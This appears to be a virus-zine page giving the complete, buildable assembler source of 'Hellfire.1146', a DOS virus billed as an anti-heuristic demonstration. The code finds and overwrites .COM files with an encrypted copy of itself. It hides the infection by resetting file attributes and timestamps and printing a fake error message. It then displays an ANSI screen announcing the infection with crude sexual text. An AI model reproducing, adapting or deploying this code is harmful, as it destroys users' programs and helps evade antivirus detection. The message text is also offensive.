Copy Link
Add to Bookmark
Report
SLAM2.021: Hellfire.1146 Anti-Heuristic Demonstration Virus
===========================================================================
Hellfire.1146 Anti-Heuristic Demonstration Virus Written by Gothmog/DHA
===========================================================================
Assumes TASM v4.00 or v5.00 or A86 Macro Assembler v4.02; other assemblers may work, but are not personally tested or quality assured.
Assemble with: tasm /m2 hell1146.asm (/m1 creates an 1148 byte variant)
tlink /t hell1146.obj
Alternately: a86 hell1146.asm hell1146.com (makes an 1157 byte variant)
.model tiny
.code
org 100h
startvirus:
call decrypt
start_encrypt:
mov ah, 4Eh
findfile:
mov cx, 07h
mov dx, offset com_mask
int 21h
jc writemessage
mov dx, 9Eh
mov ax, 3D00h
int 21h
xchg ax, bx
readFile:
mov ah, 3Fh
mov cx, 01h
mov dx, offset bugger
int 21h
closeFile:
mov ah, 3Eh
int 21h
checkfile:
mov ah, 4Fh
cmp byte ptr[bugger], 0E8h
je findfile
cmp word ptr cs:[9Ah], offset endvirus-offset startvirus
jl findfile
filegood:
mov ax, 2524h
mov dx, offset [Int24Handler+bp]
int 21h
mov ax, 4300h
mov dx, 9Eh
int 21h
push cx
mov ax, 4301h
xor cx, cx
int 21h
mov ax, 3D02h
int 21h
xchg ax, bx
infectfile:
mov ah, 2Ch
int 21h
mov key, dx
mov ah, 40h
push ax
mov cx, offset endvirus - offset startvirus
push cx
mov dx, offset startvirus
jmp writefile
writefakeerror:
mov ax, 4301h
mov dx, 9Eh
pop cx
int 21h
mov ax, 5701h
mov cx, word ptr cs:[096h]
mov dx, word ptr cs:[098h]
int 21h
mov ah, 09h
mov dx, offset fakeerror
int 21h
quitvirus:
int 20h
writemessage:
mov ah, 0Fh
int 10h
xor ah, ah
int 10h
mov ah, 01h
mov cx, 2607h
int 10h
mov ax, 0B800h
mov es, ax
mov cx, 815
mov si, offset msghellfire
xor di, di
uncrunch:
xor dx, dx
xor ax, ax
cld
loop_a:
lodsb
cmp al, 32
jc foreground
stosw
next:
loop loop_a
jmp done
foreground:
cmp al, 16
jnc background
and ah, 0F0h
or ah, al
jmp next
background:
cmp al, 24
jz next_line
jnc flash_bit_toggle
sub al, 16
add al, al
add al, al
add al, al
add al, al
and ah, 8Fh
or ah, al
jmp next
next_line:
add dx, 160
mov di, dx
jmp next
flash_bit_toggle:
cmp al, 27
jc multi_output
jnz next
xor ah, 128
jmp next
multi_output:
cmp al, 25
mov bx, cx
lodsb
mov cl, al
mov al, 32
jz start_output
lodsb
dec bx
start_output:
xor ch, ch
inc cx
rep stosw
mov cx, bx
dec cx
loopnz loop_a
done:
jmp done
Int24Handler:
mov al, 03h
iret
com_mask db '*.com', 0
fakeerror db 'Bad command or file name', 0Dh, 0Ah, '$'
msghellfire db 8,16,26,'O∞',24,26,'O∞',24,26,'O∞',24,26,11,'∞',15,20
db '⁄',26,'3ƒø',8,16,26,13,'∞',24,26,11,'∞',15,20,'≥ ',12
db 26,6,'/ ',14,'uh oh, you',39,'ve been infected with'
db ' a virus ',15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞'
db 15,20,'≥ ',12,'//',25,3,'O',25,2,15,27,'“ ¬ “ƒƒø “'
db 25,3,'“',25,3,'“ƒƒø ƒ“ƒ “ƒƒø “ƒƒø ',27,'≥',7,16,'±±'
db 8,26,11,'∞',24,26,11,'∞',15,20,'≥ ',12,'//',25,5,'> '
db ' ',15,27,'«ƒƒ¥ «ƒ',25,2,'∫',25,3,'∫',25,3,'«ƒ',25,3,'∫'
db ' «ƒ¬Ÿ «ƒ',25,3,27,'≥',7,16,'±±',8,26,11,'∞',24,26,11
db '∞',15,20,'≥ ',12,'/ \__ ~',25,2,15,27,'– ¡ –ƒƒŸ –'
db 'ƒƒŸ –ƒƒŸ –',25,3,'ƒ–ƒ – ¡ –ƒƒŸ ',27,'≥',7,16,'±±',8
db 26,11,'∞',24,26,11,'∞',15,20,'≥',25,3,12,'||',25,26,26
db 4,'/',25,13,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞'
db 15,20,'≥ ',12,'(\ \)',25,2,'(~)',25,19,'// o',25,13
db 15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥ '
db 12,'( \ \ / /',25,19,'//',25,3,'>',25,12,15,'≥',7,16
db '±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥ ',12,'( \ \'
db '/ /',25,8,26,11,'_/ \__O',25,13,15,'≥',7,16,'±±',8,26
db 11,'∞',24,26,11,'∞',15,20,'≥ ',12,'(',25,2,'\__/',25
db 8,'/ ___ ',26,5,'_\//',25,16,15,'≥',7,16,'±±',8,26,11
db '∞',24,26,11,'∞',15,20,'≥ ',12,'/',25,2,'| /@',25,7,'('
db ' / / ',26,5,'_)/',25,17,15,'≥',7,16,'±±',8,26,11,'∞'
db 24,26,11,'∞',15,20,'≥ ',12,'(',25,3,'|//',25,9,'\ \ '
db '/ /',25,2,'(_)',25,19,15,'≥',7,16,'±±',8,26,11,'∞',24
db 26,11,'∞',15,20,'≥ ',12,'\',25,2,'()',25,11,'\ \O/',25
db 26,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥'
db 25,2,12,'\ |',25,13,') )',25,27,15,'≥',7,16,'±±',8,26
db 11,'∞',24,26,11,'∞',15,20,'≥',25,3,12,') )',25,12,'/'
db ' /',25,28,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15
db 20,'≥',25,2,12,'( |_',25,10,'/ /_ ',10,'so, do you'
db ' like taking it ',15,'≥',7,16,'±±',8,26,11,'∞',24,26
db 11,'∞',15,20,'≥',25,2,12,'(',26,3,'_>',25,8,'(',26,3,'_'
db '>',25,7,10,'up the ass?',25,8,15,'≥',7,16,'±±',8,26,11
db '∞',24,26,11,'∞',15,20,'¿',26,'3ƒŸ',7,16,'±±',8,26,11
db '∞',24,26,13,'∞',7,26,'5±',8,26,11,'∞',24,26,'O∞',24,26
db 'O∞',24,26,'O∞',24
end_encrypt equ $ - 1
writefile:
call encrypt
pop cx
pop ax
int 21h
call decrypt
jmp writefakeerror
encrypt:
decrypt:
mov si, offset start_encrypt
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2
xorLoop:
lodsw
jmp hahahahaha
oioioioioi:
stosw
loop xorLoop
ret
hahahahaha:
db 35h
key dw 0000
jnc oioioioioi
endvirus:
bugger db ?
f_attr db 09h dup (?)
end startvirus
; ============================================================[ code ends ]==